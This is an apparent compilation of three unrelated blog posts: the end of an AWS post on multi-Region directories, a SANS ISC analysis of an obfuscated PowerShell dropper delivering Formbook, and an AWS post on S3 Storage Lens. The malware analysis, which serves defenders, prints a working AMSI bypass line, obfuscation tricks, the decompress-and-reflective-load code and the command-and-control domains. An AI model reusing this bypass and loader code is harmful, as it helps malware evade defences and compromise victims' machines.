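The same step can also be scripted. Below is a sketch using the Directory Service AddRegion API through boto3; the directory, VPC, and subnet IDs are placeholders, and the parameter names reflect my assumption of the SDK shape, so verify them against the current documentation:

import boto3

# Call the API in the directory's primary Region.
ds = boto3.client("ds", region_name="us-east-1")

# Add US West (Oregon) as a replicated Region for an existing directory.
# Directory, VPC and subnet IDs below are placeholders.
ds.add_region(
    DirectoryId="d-1234567890",
    RegionName="us-west-2",
    VPCSettings={
        "VpcId": "vpc-0abc1234",
        "SubnetIds": ["subnet-0aaa1111", "subnet-0bbb2222"],   # two subnets in separate AZs
    },
)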

Costs
You pay by the hour for the domain controllers in each Region, plus the cross-region data transfer. It's important to understand that this feature will create two domain controllers in each Region that you add; applications that reside in these Regions can now communicate with a local directory, which lowers costs by minimizing the need for data transfer. To learn more, visit the pricing page.

Available Now
This new feature can be used today and is available for both new and existing directories that use the Enterprise Edition in any of the following Regions: US East (N. Virginia), US East (Ohio), US West (N. California), US West (Oregon), AWS GovCloud (US-East), Asia Pacific (Mumbai), Asia Pacific (Seoul), Asia Pacific (Singapore), Asia Pacific (Sydney), Asia Pacific (Tokyo), Canada (Central), Europe (Frankfurt), Europe (Ireland), Europe (London), Europe (Paris), Europe (Stockholm), and South America (São Paulo).

Head over to the product page to learn more, view pricing, and get started creating directories that span multiple AWS Regions.

Happy Administering

— Martin

PowerShell Dropper Delivering Formbook, (Thu, Nov 19th)

Here is an interesting PowerShell dropper that is nicely obfuscated and has anti-VM detection. I spotted this file yesterday, called 'ad.jpg' (SHA256:b243e807ed22359a3940ab16539ba59910714f051034a8a155cc2aff28a85088). Of course, it's not a picture but a huge text file with Base64-encoded data. The VT score is therefore interesting: 0/61![1]. Once decoded, we discover the obfuscated PowerShell code. Let's review the techniques implemented by the attacker.

First, we see this at the very beginning of the script:

[Ref].Assembly.GetType('System.Management.Automation.'+$([CHAr]([Byte]0x41)+[ChAr]([bYTe]0x6D)+[Char](82+33)+
[ChAr]([BYTe]0x69))+'Utils').GetField($([SyStEM.Net.WEBUTilItY]::htMLdeCode('amsiInitFailed')),'NonPublic,Static').SetValue($null,$true);

Which is deobfuscated into:

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);

This piece of code comes from the PoSHBypass[2] project. It's a proof of concept that allows an attacker to bypass PowerShell's Constrained Language Mode, AMSI, and ScriptBlock and Module logging.

Then, classic behaviour, we have an obfuscation of the Invoke-Expression cmdlet:

$ZER0HRFGEPXLGAJHCZYNIFQKWXNPYMID='MEX'.replace('M','I');
sal g $ZER0HRFGEPXLGAJHCZYNIFQKWXNPYMID;

This code will make 'g' an alias of Invoke-Expression. This is used immediately to decode and execute the following chunk of data:

[Byte[]]$IMAGE_NT_HEADERS=('@1F,@8B,@08,@00,@00,@00,@00,@00,@04,@00,@ED,@BD,@07,@60,@1C,@49,@96,@25,@26,@2F,@6D,@CA,@7B,@7F,@4A,
@F5,@4A,@D7,@E0,@74,@A1,@08,@80,@60,@13,@24,@D8,@90,@40,@10,@EC,@C1,@88,@CD,@E6,@92,@EC,@1D,@69,@47,
@23,@29,@AB,@2A,@81,@CA,@65,@56,@65,@5D,@66,@16,@40,@CC,@ED,@9D,@BC,@F7,@DE,@7B,@EF,@BD,@F7,@DE,@7B,
@EF,@BD,@F7,@BA,@3B,@9D,@4E,@27,@F7,@DF,@FF,@3F,@5C,@66,@64,@01,@6C,@F6,@CE,@4A,@DA,@C9,@9E,@21,@80,
...
@34,@6F,@8F,@7E,@8D,@1F,@23,@18,@C7,@CC,@FF,@18,@F3,@84,@A0,@83,@EB,@FB,@70,@EE,@D3,@BB,@BB,@0A,@6B,
@C7,@D2,@E4,@47,@CF,@FF,@B7,@9E,@5F,@E3,@E5,@AF,@43,@5C,@4C,@72,@77,@FF,@FF,@63,@78,@FF,@E8,@F9,@46,
@9E,@FF,@07,@78,@61,@2A,@8D,@00,@42,@04,@00,@00'.replace('@','0x'))| g;

The result string is passed to the following function:

function JAPFYAQPECMKYQNLCJXCOFSVYMER {
  [CmdletBinding()]
  Param ([bYte[]] $VDLXLPBUCEUOIHNKREBMWCWEFMERbyteARRay)
  Process {
    $WRSWRLDCDXEUUYFBJUWQZJSDGMERiNput = New-Object System.IO.MemoryStream( , $VDLXLPBUCEUOIHNKREBMWCWEFMERbyteARRay )
    $MZCUMHEBORHYCNKFFBEUSZDTZMERouTPut = New-Object System.IO.MemoryStream
    $PHQDSFCPEMOPKRYRNBGRTBCCIMERPAGE_EXECUTE_READWRITE = New-Object System.IO.Compression.GzipStream $WRSWRLDCDXEUUYFBJUWQZJSDGMERiNput, ([IO.Compression.CompressionMode]::Decompress)
    $EONFFJPUIRZMNCRBQZKESIVGGMIDCONTEXT_FULL = New-Object bYtE[](1024)
    while($tRUe){
      $BBYRATZNTGIAUBPDRVBIQAMRDMERREread = $PHQDSFCPEMOPKRYRNBGRTBCCIMERPAGE_EXECUTE_READWRITE.Read($EONFFJPUIRZMNCRBQZKESIVGGMIDCONTEXT_FULL, 0, 1024)
      if ($BBYRATZNTGIAUBPDRVBIQAMRDMERREread -lE 0){bReAk}
      $MZCUMHEBORHYCNKFFBEUSZDTZMERouTPut.Write($EONFFJPUIRZMNCRBQZKESIVGGMIDCONTEXT_FULL, 0, $BBYRATZNTGIAUBPDRVBIQAMRDMERREread)
    }
    [bYte[]] $QTXDBVKLTJMGOACBLEIVSJSQHMIDouT = $MZCUMHEBORHYCNKFFBEUSZDTZMERouTPut.ToArray()
  }
}

It will uncompress the buffer and generate a DLL (SHA256:A7D74BE8AF1645FBECFC2FE915E0B77B287CE09AD3A7E220D20794475B0401F9) which is not present on VT at this time. This DLL is injected in the PowerShell process:

[bYte[]]$decompressedByteArray = JAPFYAQPECMKYQNLCJXCOFSVYMER $IMAGE_NT_HEADERS
$t=[System.Reflection.Assembly]::Load($decompressedByteArray)
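
To recover the DLL for static analysis, the decoding is easy to reproduce outside PowerShell. Here is a minimal Python sketch (the input file, a dump of the '@'-encoded string, is hypothetical):

import gzip
import re

# 'stage1_bytes.txt' is a hypothetical dump of the $IMAGE_NT_HEADERS string from the dropper.
blob = open("stage1_bytes.txt").read()

# Rebuild the byte array from the '@xx' hex notation, then gunzip it to obtain the DLL.
data = bytes(int(h, 16) for h in re.findall(r"@([0-9A-Fa-f]{2})", blob))
with open("stage2.dll", "wb") as f:
    f.write(gzip.decompress(data))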

Then, another chunk of data is decoded:

[Byte[]]$HNAUVVBGYKNXXMOTZHSTOHTKRMID=('@4D,@5A,@45,@52,@E8,@00,@00,@00,@00,@58,@83,@E8,@09,@8B,@C8,@83,@C0,@3C,@8B,@00,@03,@C1,@83,@C0,@28,@03,@08,
@FF,@E1,@90,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,
@00,@00,@00,@00,@00,@00,@C0,@00,@00,@00,@0E,@1F,@BA,@0E,@00,@B4,@09,@CD,@21,@B8,@01,@4C,@CD,@21,@54,@68,@69,
@73,@20,@70,@72,@6F,@67,@72,@61,@6D,@20,@63,@61,@6E,@6E,@6F,@74,@20,@62,@65,@20,@72,@75,@6E,@20,@69,@6E,@20,
...
0,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00,@00'.replace('@','0x'))| g

This is the main payload dropped by the PowerShell script (SHA256:A07AE0F8E715E243C514B8DA6FD83C5955E1C8EDE5EEBF4D6494EE97443AAD95). Same here, it's not available on VT yet.

The payload is executed via the following code:

[QuotingUtilities]::SplitUnquoted('control.exe',$HNAUVVBGYKNXXMOTZHSTOHTKRMID)

This function is provided by the injected DLL:

This function implements an interesting anti-VM check that, if running in a virtualized environment, stops the PowerShell process and prevents the payload from being executed:

Note that I don't know why a popup message is displayed. The goal of malware is to operate below the radar… (maybe the code is still being debugged by the attacker?)

Here is how the VMware environment is detected:

(Maybe there are other tests performed but I did not investigate further)

The DLL is also obfuscated with a tool that I had never encountered before:

If you have more information about this "Zephyrus Protector" tool, please share with me!

The Formbook sample tries to contact the following hosts:

www[.]zenhalklailiskiler[.]online 
www[.]insights-for-instagram[.]com 
www[.]ketaminetherapycalgary[.]com 
www[.]forwardslashdevelopment[.]com 
www[.]arikmertelsanatlari[.]xyz
www[.]bklynphotography[.]com 
www[.]experiencewinneroftheyear[.]com 
www[.]kansas-chiefs[.]com 
www[.]vrefirsttime[.]com 
www[.]issahclothing[.]com 
www[.]denver-nuggets[.]club 
www[.]wwwhookeze[.]com
www[.]moxieadvice[.]com 
www[.]gangtayvietnam[.]com 
www[.]cosmosguards[.]com 
www[.]magentx2[.]info

[1] https://www.virustotal.com/gui/file/b243e807ed22359a3940ab16539ba59910714f051034a8a155cc2aff28a85088/detection
[2] https://github.com/davehardy20/PoSHBypass

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Introducing Amazon S3 Storage Lens – Organization-wide Visibility Into Object Storage

When starting out in the cloud, a customer’s storage requirements might consist of a handful of S3 buckets, but as they grow, migrate more applications and realize the power of the cloud, things can become more complicated. A customer may have tens or even hundreds of accounts and have multiple S3 buckets across numerous AWS Regions. Customers managing these sorts of environments have told us that they find it difficult to understand how storage is used across their organization, optimize their costs, and improve security posture.

Drawing from more than 14 years of experience helping customers optimize their storage, the S3 team has built a new feature called Amazon S3 Storage Lens. This is the first cloud storage analytics solution to give you organization-wide visibility into object storage, with point-in-time metrics and trend lines as well as actionable recommendations. All these things combined will help you discover anomalies, identify cost efficiencies and apply data protection best practices.

With S3 Storage Lens, you can understand, analyze, and optimize storage with 29+ usage and activity metrics and interactive dashboards to aggregate data for your entire organization, specific accounts, regions, buckets, or prefixes. All of this data is accessible in the S3 Management Console or as raw data in an S3 bucket.

Every Customer Gets a Default Dashboard

S3 Storage Lens includes an interactive dashboard which you can find in the S3 console. The dashboard gives you the ability to perform filtering and drill-down into your metrics to really understand how your storage is being used. The metrics are organized into categories like data protection and cost efficiency, to allow you to easily find relevant metrics.

For ease of use, all customers receive a default dashboard. If you are like many customers, this may be the only dashboard that you need, but if you want to, you can make changes. For example, you could configure the dashboard to export the data daily to an S3 bucket for analysis with another tool (Amazon QuickSight, Amazon Athena, Amazon Redshift, etc.) or you could upgrade to receive advanced metrics and recommendations.

Creating a Dashboard
You can also create your own dashboards from scratch. To do this, I head over to the S3 console and click on the Dashboards menu item inside the Storage Lens section. Then, I click the Create dashboard button.

Screenshot of the console

I give my dashboard the name s3-lens-demo and select a home Region. The home Region is where the metrics data for your dashboard will be stored. I choose to enable the dashboard, meaning that it will be updated daily with new metrics.

A dashboard can analyze storage across accounts, Regions, buckets, and prefixes. I choose to include buckets from all accounts in my organization and across all Regions in the Dashboard scope section.

S3 Storage Lens has two tiers: Free Metrics, which is free of charge, automatically available for all S3 customers and contains 15 usage related metrics; and Advanced metrics and recommendations, which has an additional charge, but includes all 29 usage and activity metrics with 15-month data retention, and contextual recommendations. For this demo, I select Advanced metrics and recommendations.

Screenshot of Management Console

Finally, I can configure the dashboard metrics to be exported daily to a specific S3 bucket. The metrics can be exported to either CSV or Apache Parquet format for further analysis outside of the console.

An alert pops up to tell me that my dashboard has been created, but it can take up to 48 hours to generate my initial metrics.

What does a Dashboard Show?

Once my dashboard has been created, I can start to explore the data. I can filter by Accounts, Regions, Storage classes, Buckets, and Prefixes at the top of the dashboard.

The next section is a snapshot of the metrics such as the Total storage and Object count, and I can see a trendline that shows the trend on each metric over the last 30 days and a percentage change. The number in the % change column shows by default the Day/day percentage change, but I can select to compare by Week/week or Month/month.

I can toggle between different Metric groups by selecting either Summary, Cost efficiency, Data protection, or Activity.

There are some metrics here that are pretty typical like total storage and object counts, and you can already receive these in a few places in the S3 console and in Amazon CloudWatch – but in S3 Storage Lens you can receive these metrics in aggregate across your organization or account, or at the prefix level, which was not previously possible.

There are some other metrics you might not expect, like metrics that pertain to S3 feature utilization. For example we can break out the % of objects that are using encryption, or the number of objects that are non-current versions. These metrics help you understand how your storage is configured, and allows you to identify discrepancies, and then drill in for details.

The dashboard provides contextual recommendations alongside your metrics to indicate actions you can take based on the metric, for example ways to improve cost efficiency, or apply data protection best practices. Any recommendations are shown in the Recommendation column. A few days ago I took the screenshot below which shows a recommendation on one of my dashboards that suggests I should check my buckets’ default encryption configuration.

The dashboard trends and distribution section allows me to compare two metrics over time in more detail. Here I have selected Total storage as my Primary metric and Object Count as my Secondary metric.

These two metrics are now plotted on a graph, and I can select a date range to view the trend over time.

The dashboard also shows me those two metrics and how they are distributed across Storage class and Regions.

I can click on any value in this graph and Drill down to filter the entire dashboard on that value, or select Analyze by to navigate to a new dashboard view for that dimension.

The last section of the dashboard allows me to perform a Top N analysis of a metric over a date range, where N is between 1 and 25. In the example below, I have selected the top 3 items in descending order for the Total storage metric.

I can then see the top three accounts (note: there are only two accounts in my organization) and the Total storage metric for each account.

It also shows the top 3 Regions for the Total storage metric, and I can see that 51.15% of my data is stored in US East (N. Virginia).

Lastly, the dashboard contains information about the top 3 buckets and prefixes and the associated trends.

As I have shown, S3 Storage Lens delivers more than 29 individual metrics on S3 storage usage and activity for all accounts in your organization. These metrics are available in the S3 console to visualize storage usage and activity trends in a dashboard, with contextual recommendations that make it easy to take immediate action. In addition to the dashboard in the S3 console, you can export metrics in CSV or Parquet format to an S3 bucket of your choice for further analysis with other tools including Amazon QuickSight, Amazon Athena, or Amazon Redshift to name a few.

Video Walkthrough

If you would like a more in-depth look at S3 Storage Lens, the team has recorded the following video to explain how this new feature works.

Available Now

S3 Storage Lens is available in all commercial AWS Regions. You can use S3 Storage Lens with the Amazon S3 API, CLI, or in the S3 Console. For pricing information regarding S3 Storage Lens advanced metrics and recommendations, check out the Amazon S3 pricing page. If you'd like to dive a little deeper, then you should check out the documentation or the S3 Storage Lens webpage.
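
For example, Storage Lens dashboard configurations are managed through the S3 Control API. Here is a small boto3 sketch; the account ID is a placeholder, and the response field name is an assumption to verify against the current SDK documentation:

import boto3

s3control = boto3.client("s3control")

# List the Storage Lens configurations in the account (the account ID is a placeholder).
resp = s3control.list_storage_lens_configurations(AccountId="123456789012")
for cfg in resp.get("StorageLensConfigurationList", []):   # field name assumed; check the SDK docs
    print(cfg)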

Happy Storing

— Martin